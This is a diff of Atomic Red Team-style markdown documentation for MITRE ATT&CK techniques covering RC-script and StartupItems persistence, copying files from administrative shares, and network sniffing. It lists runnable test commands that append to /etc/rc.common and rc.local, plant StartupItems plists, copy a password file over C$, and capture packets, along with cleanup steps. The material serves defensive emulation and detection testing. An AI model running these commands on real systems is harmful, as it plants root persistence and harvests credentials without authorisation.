+> Adversaries may establish persistence by adding a malicious binary path or shell commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
+> 
+> Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as ESXi hypervisors, IoT, or embedded systems.(Citation: intezer-kaiji-malware) As ESXi servers store most system files in memory and therefore discard changes on shutdown, leveraging `/etc/rc.local.d/local.sh` is one of the few mechanisms for enabling persistence across reboots.(Citation: Juniper Networks ESXi Backdoor 2022)
+> 
+> Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of Launchd.(Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)

-Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as ESXi hypervisors, IoT, or embedded systems.(Citation: intezer-kaiji-malware) As ESXi servers store most system files in memory and therefore discard changes on shutdown, leveraging `/etc/rc.local.d/local.sh` is one of the few mechanisms for enabling persistence across reboots.(Citation: Juniper Networks ESXi Backdoor 2022)
-
-Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of Launchd.(Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1037/004)

 ## Atomic Tests

- [Atomic Test #1 - rc.common](#atomic-test-1---rccommon)
+- [Atomic Test #1: rc.common](#atomic-test-1-rccommon)
+- [Atomic Test #2: rc.common](#atomic-test-2-rccommon)
+- [Atomic Test #3: rc.local](#atomic-test-3-rclocal)

- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon)
+### Atomic Test #1: rc.common

- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal)
-
-
-<br/>
-
-## Atomic Test #1 - rc.common
 Modify rc.common

 [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)

 **Supported Platforms:** macOS

+**auto_generated_guid:** `97a48daa-8bca-4bc0-b1a9-c1d163e762de`

-**auto_generated_guid:** 97a48daa-8bca-4bc0-b1a9-c1d163e762de
-
-
-
-
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
 ```

+### Atomic Test #2: rc.common

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - rc.common
 Modify rc.common

 **Supported Platforms:** Linux

+**auto_generated_guid:** `c33f3d80-5f04-419b-a13a-854d1cbdbf3a`

-**auto_generated_guid:** c33f3d80-5f04-419b-a13a-854d1cbdbf3a
-
-
-
-
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
@@ -77,33 +52,20 @@ printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
 sudo chmod +x /etc/rc.common
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```bash
 origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
 ```
+### Atomic Test #3: rc.local

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - rc.local
 Modify rc.local

 **Supported Platforms:** Linux

+**auto_generated_guid:** `126f71af-e1c9-405c-94ef-26a47b16c102`

-**auto_generated_guid:** 126f71af-e1c9-405c-94ef-26a47b16c102
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
@@ -113,13 +75,8 @@ printf 'exit 0' | sudo tee -a /etc/rc.local
 sudo chmod +x /etc/rc.local
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
 ```
-
-
-
-
-
-<br/>
@@ -1,82 +1,59 @@
 # T1037.005 - Boot or Logon Initialization Scripts: Startup Items
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/005)
-<blockquote>

-Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)
+## Description from ATT&CK

-This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory. 
+> Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)
+> 
+> This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory.
+> 
+> An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.

-An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1037/005)

 ## Atomic Tests

- [Atomic Test #1 - Add file to Local Library StartupItems](#atomic-test-1---add-file-to-local-library-startupitems)
+- [Atomic Test #1: Add file to Local Library StartupItems](#atomic-test-1-add-file-to-local-library-startupitems)
+- [Atomic Test #2: Add launch script to launch daemon](#atomic-test-2-add-launch-script-to-launch-daemon)
+- [Atomic Test #3: Add launch script to launch agent](#atomic-test-3-add-launch-script-to-launch-agent)

- [Atomic Test #2 - Add launch script to launch daemon](#atomic-test-2---add-launch-script-to-launch-daemon)
+### Atomic Test #1: Add file to Local Library StartupItems

- [Atomic Test #3 - Add launch script to launch agent](#atomic-test-3---add-launch-script-to-launch-agent)
-
-
-<br/>
-
-## Atomic Test #1 - Add file to Local Library StartupItems
 Modify or create an file in /Library/StartupItems
 [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware)

 **Supported Platforms:** macOS

+**auto_generated_guid:** `134627c3-75db-410e-bff8-7a920075f198`

-**auto_generated_guid:** 134627c3-75db-410e-bff8-7a920075f198
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 sudo touch /Library/StartupItems/EvilStartup.plist
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```sh
 sudo rm /Library/StartupItems/EvilStartup.plist
 ```
+### Atomic Test #2: Add launch script to launch daemon

-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Add launch script to launch daemon
 Add launch script to /Library/StartupItems to launch agent
 [Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)

 **Supported Platforms:** macOS

+**auto_generated_guid:** `fc369906-90c7-4a15-86fd-d37da624dde6`

-**auto_generated_guid:** fc369906-90c7-4a15-86fd-d37da624dde6
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | path_malicious_script | Name of script to store in cron folder | string | $PathToAtomicsFolder/T1037.005/src/T1037.005_daemon.sh|
 | path_malicious_plist | Name of file to store in /tmp | string | $PathToAtomicsFolder/T1037.005/src/T1037_005_daemon.plist|
 | path_startup_params | Name of plist with startup params | string | $PathToAtomicsFolder/T1037.005/src/StartupParameters.plist|

-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 sudo cp #{path_startup_params} /Library/StartupItems/StartupParameters.plist
@@ -85,7 +62,8 @@ sudo cp #{path_malicious_plist} /tmp/T1037_005_daemon.plist
 sudo /Library/StartupItems/atomic.sh start
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```bash
 sudo launchctl unload /tmp/T1037_005_daemon.plist
 sudo rm /tmp/T1037_005_daemon.plist
@@ -94,66 +72,68 @@ sudo rm /Library/StartupItems/StartupParameters.plist
 sudo rm /tmp/T1037_005_daemon.txt
 ```

+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: /Library/StartupItems must exist
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ ! -d /Library/StartupItems ]; then mkdir /Library/StartupItems; exit 0; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 echo "Failed to create /Library/StartupItems"; exit 1;
 ```
+
 ##### Description: The shared library must exist on disk at specified location (#{path_malicious_plist})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 echo "The plist file doesn't exist. Check the path and try again."; exit 1;
 ```
+
 ##### Description: The startup script must exist on disk at specified location (#{path_malicious_script})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ -f #{path_malicious_script} ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 echo "The startup script doesn't exist. Check the path and try again."; exit 1;
 ```

+### Atomic Test #3: Add launch script to launch agent

-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Add launch script to launch agent
 Add launch script to /Library/StartupItems to launch agent
 [Example](https://cybersecurity.att.com/blogs/labs-research/diversity-in-recent-mac-malware)

 **Supported Platforms:** macOS

+**auto_generated_guid:** `10cf5bec-49dd-4ebf-8077-8f47e420096f`

-**auto_generated_guid:** 10cf5bec-49dd-4ebf-8077-8f47e420096f
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | path_malicious_script | Name of script to store in cron folder | string | $PathToAtomicsFolder/T1037.005/src/T1037.005_agent.sh|
 | path_malicious_plist | Name of file to store in /tmp | string | $PathToAtomicsFolder/T1037.005/src/T1037_005_agent.plist|
 | path_startup_params | Name of plist with startup params | string | $PathToAtomicsFolder/T1037.005/src/StartupParameters.plist|

-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 sudo cp #{path_startup_params} /Library/StartupItems/StartupParameters.plist
@@ -162,7 +142,8 @@ sudo cp #{path_malicious_plist} /tmp/T1037_005_agent.plist
 /Library/StartupItems/atomic.sh start
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```bash
 sudo launchctl unload /tmp/T1037_005_agent.plist
 sudo rm /tmp/T1037_005_agent.plist
@@ -171,38 +152,47 @@ sudo rm /Library/StartupItems/StartupParameters.plist
 sudo rm /tmp/T1037_005_agent.txt
 ```

+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: /Library/StartupItems must exist
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ ! -d /Library/StartupItems ]; then mkdir /Library/StartupItems; exit 0; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 echo "Failed to create /Library/StartupItems"; exit 1;
 ```
+
 ##### Description: The shared library must exist on disk at specified location (#{path_malicious_plist})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ -f #{path_malicious_plist} ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 echo "The plist file doesn't exist. Check the path and try again."; exit 1;
 ```
+
 ##### Description: The startup script must exist on disk at specified location (#{path_malicious_script})
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ -f #{path_malicious_script} ]; then exit 0; else exit 1; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 echo "The startup script doesn't exist. Check the path and try again."; exit 1;
 ```

-
-
-
-<br/>
@@ -1,139 +1,133 @@
 # T1039 - Data from Network Shared Drive
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1039)
-<blockquote>

-Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.
+## Description from ATT&CK

-</blockquote>
+> Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.
+
+[Source](https://attack.mitre.org/techniques/T1039)

 ## Atomic Tests

- [Atomic Test #1 - Copy a sensitive File over Administrative share with copy](#atomic-test-1---copy-a-sensitive-file-over-administrative-share-with-copy)
+- [Atomic Test #1: Copy a sensitive File over Administrative share with copy](#atomic-test-1-copy-a-sensitive-file-over-administrative-share-with-copy)
+- [Atomic Test #2: Copy a sensitive File over Administrative share with Powershell](#atomic-test-2-copy-a-sensitive-file-over-administrative-share-with-powershell)

- [Atomic Test #2 - Copy a sensitive File over Administrative share with Powershell](#atomic-test-2---copy-a-sensitive-file-over-administrative-share-with-powershell)
+### Atomic Test #1: Copy a sensitive File over Administrative share with copy

-
-<br/>
-
-## Atomic Test #1 - Copy a sensitive File over Administrative share with copy
 Copy from sensitive File from the c$ of another LAN computer with copy cmd
 https://twitter.com/SBousseaden/status/1211636381086339073

 **Supported Platforms:** Windows

+**auto_generated_guid:** `6ed67921-1774-44ba-bac6-adb51ed60660`

-**auto_generated_guid:** 6ed67921-1774-44ba-bac6-adb51ed60660
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote | Remote server name | string | 127.0.0.1|
 | share_file | Remote Path to the file | path | Windows&#92;temp&#92;Easter_Bunny.password|
 | local_file | Local name | string | Easter_egg.password|

-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

 ```cmd
 copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file}
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```cmd
 del \\#{remote}\C$\#{share_file}
 del %TEMP%\#{local_file}
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Administrative share must exist on #{remote}
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Write-Host 'Please Enable "C$" share on #{remote}'
 ```
+
 ##### Description: "\\#{remote}\C$\#{share_file}" must exist on #{remote}
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Out-File -FilePath "\\#{remote}\C$\#{share_file}"
 ```

+### Atomic Test #2: Copy a sensitive File over Administrative share with Powershell

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Copy a sensitive File over Administrative share with Powershell
 Copy from sensitive File from the c$ of another LAN computer with powershell
 https://twitter.com/SBousseaden/status/1211636381086339073

 **Supported Platforms:** Windows

+**auto_generated_guid:** `7762e120-5879-44ff-97f8-008b401b9a98`

-**auto_generated_guid:** 7762e120-5879-44ff-97f8-008b401b9a98
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | remote | Remote server name | string | 127.0.0.1|
 | share_file | Remote Path to the file | path | Windows&#92;temp&#92;Easter_Bunny.password|
 | local_file | Local name | string | Easter_egg.password|

-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

 ```powershell
 copy-item -Path "\\#{remote}\C$\#{share_file}" -Destination "$Env:TEMP\#{local_file}"
 ```

-#### Cleanup Commands:
+#### Cleanup Commands
+
 ```powershell
 Remove-Item -Path "\\#{remote}\C$\#{share_file}"
 Remove-Item -Path "$Env:TEMP\#{local_file}"
 ```

+#### Dependencies: Run with `powershell`!

-
-#### Dependencies:  Run with `powershell`!
 ##### Description: Administrative share must exist on #{remote}
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Write-Host 'Please Enable "C$" share on #{remote}'
 ```
+
 ##### Description: "\\#{remote}\C$\#{share_file}" must exist on #{remote}
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```powershell
 if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1}
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```powershell
 Out-File -FilePath "\\#{remote}\C$\#{share_file}"
 ```

-
-
-
-<br/>
@@ -1,78 +1,55 @@
 # T1040 - Network Sniffing
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1040)
-<blockquote>

-Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
+## Description from ATT&CK

-Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
+> Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
+> 
+> Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
+> 
+> Network sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Defense Evasion](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment.
+> 
+> In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)
+> 
+> On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)

-Network sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Defense Evasion](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment.
-
-In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)
-
-On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)
-
-</blockquote>
+[Source](https://attack.mitre.org/techniques/T1040)

 ## Atomic Tests

- [Atomic Test #1 - Packet Capture Linux using tshark or tcpdump](#atomic-test-1---packet-capture-linux-using-tshark-or-tcpdump)
+- [Atomic Test #1: Packet Capture Linux using tshark or tcpdump](#atomic-test-1-packet-capture-linux-using-tshark-or-tcpdump)
+- [Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump](#atomic-test-2-packet-capture-freebsd-using-tshark-or-tcpdump)
+- [Atomic Test #3: Packet Capture macOS using tcpdump or tshark](#atomic-test-3-packet-capture-macos-using-tcpdump-or-tshark)
+- [Atomic Test #4: Packet Capture Windows Command Prompt](#atomic-test-4-packet-capture-windows-command-prompt)
+- [Atomic Test #5: Windows Internal Packet Capture](#atomic-test-5-windows-internal-packet-capture)
+- [Atomic Test #6: Windows Internal pktmon capture](#atomic-test-6-windows-internal-pktmon-capture)
+- [Atomic Test #7: Windows Internal pktmon set filter](#atomic-test-7-windows-internal-pktmon-set-filter)
+- [Atomic Test #8: Packet Capture macOS using /dev/bpfN with sudo](#atomic-test-8-packet-capture-macos-using-devbpfn-with-sudo)
+- [Atomic Test #9: Filtered Packet Capture macOS using /dev/bpfN with sudo](#atomic-test-9-filtered-packet-capture-macos-using-devbpfn-with-sudo)
+- [Atomic Test #10: Packet Capture FreeBSD using /dev/bpfN with sudo](#atomic-test-10-packet-capture-freebsd-using-devbpfn-with-sudo)
+- [Atomic Test #11: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo](#atomic-test-11-filtered-packet-capture-freebsd-using-devbpfn-with-sudo)
+- [Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo](#atomic-test-12-packet-capture-linux-socket-af_packetsock_raw-with-sudo)
+- [Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo](#atomic-test-13-packet-capture-linux-socket-af_inetsock_rawtcp-with-sudo)
+- [Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo](#atomic-test-14-packet-capture-linux-socket-af_inetsock_packetudp-with-sudo)
+- [Atomic Test #15: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo](#atomic-test-15-packet-capture-linux-socket-af_packetsock_raw-with-bpf-filter-for-udp-with-sudo)
+- [Atomic Test #16: PowerShell Network Sniffing](#atomic-test-16-powershell-network-sniffing)

- [Atomic Test #2 - Packet Capture FreeBSD using tshark or tcpdump](#atomic-test-2---packet-capture-freebsd-using-tshark-or-tcpdump)
+### Atomic Test #1: Packet Capture Linux using tshark or tcpdump

- [Atomic Test #3 - Packet Capture macOS using tcpdump or tshark](#atomic-test-3---packet-capture-macos-using-tcpdump-or-tshark)
-
- [Atomic Test #4 - Packet Capture Windows Command Prompt](#atomic-test-4---packet-capture-windows-command-prompt)
-
- [Atomic Test #5 - Windows Internal Packet Capture](#atomic-test-5---windows-internal-packet-capture)
-
- [Atomic Test #6 - Windows Internal pktmon capture](#atomic-test-6---windows-internal-pktmon-capture)
-
- [Atomic Test #7 - Windows Internal pktmon set filter](#atomic-test-7---windows-internal-pktmon-set-filter)
-
- [Atomic Test #8 - Packet Capture macOS using /dev/bpfN with sudo](#atomic-test-8---packet-capture-macos-using-devbpfn-with-sudo)
-
- [Atomic Test #9 - Filtered Packet Capture macOS using /dev/bpfN with sudo](#atomic-test-9---filtered-packet-capture-macos-using-devbpfn-with-sudo)
-
- [Atomic Test #10 - Packet Capture FreeBSD using /dev/bpfN with sudo](#atomic-test-10---packet-capture-freebsd-using-devbpfn-with-sudo)
-
- [Atomic Test #11 - Filtered Packet Capture FreeBSD using /dev/bpfN with sudo](#atomic-test-11---filtered-packet-capture-freebsd-using-devbpfn-with-sudo)
-
- [Atomic Test #12 - Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo](#atomic-test-12---packet-capture-linux-socket-af_packetsock_raw-with-sudo)
-
- [Atomic Test #13 - Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo](#atomic-test-13---packet-capture-linux-socket-af_inetsock_rawtcp-with-sudo)
-
- [Atomic Test #14 - Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo](#atomic-test-14---packet-capture-linux-socket-af_inetsock_packetudp-with-sudo)
-
- [Atomic Test #15 - Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo](#atomic-test-15---packet-capture-linux-socket-af_packetsock_raw-with-bpf-filter-for-udp-with-sudo)
-
- [Atomic Test #16 - PowerShell Network Sniffing](#atomic-test-16---powershell-network-sniffing)
-
-
-<br/>
-
-## Atomic Test #1 - Packet Capture Linux using tshark or tcpdump
 Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.

 Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `7fe741f7-b265-4951-a7c7-320889083b3e`

-**auto_generated_guid:** 7fe741f7-b265-4951-a7c7-320889083b3e
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | interface | Specify interface to perform PCAP on. | string | ens33|

-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin)

 ```bash
 tcpdump -c 5 -nnni #{interface}
@@ -80,47 +57,39 @@ tshark -c 5 -i #{interface}
 ```


+#### Dependencies: Run with `bash`!

-
-#### Dependencies:  Run with `bash`!
 ##### Description: Check if at least one of tcpdump or tshark is installed.
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```bash
 if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
 ```
-##### Get Prereq Commands:
+
+###### Get Prereq Commands
+
 ```bash
 (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
 ```

+### Atomic Test #2: Packet Capture FreeBSD using tshark or tcpdump

-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Packet Capture FreeBSD using tshark or tcpdump
 Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.

 Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.

 **Supported Platforms:** Linux

+**auto_generated_guid:** `c93f2492-9ebe-44b5-8b45-36574cccfe67`

-**auto_generated_guid:** c93f2492-9ebe-44b5-8b45-36574cccfe67
+#### Inputs

-
-
-
-
-#### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | interface | Specify interface to perform PCAP on. | string | em0|

-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)

 ```sh
 tcpdump -c 5 -nnni #{interface}
@@ -128,47 +97,39 @@ tshark -c 5 -i #{interface}
 ```


+#### Dependencies: Run with `sh`!

-
-#### Dependencies:  Run with `sh`!
 ##### Description: Check if at least one of tcpdump or tshark is installed.
-##### Check Prereq Commands:
+
+###### Check Prereq Commands
+
 ```sh
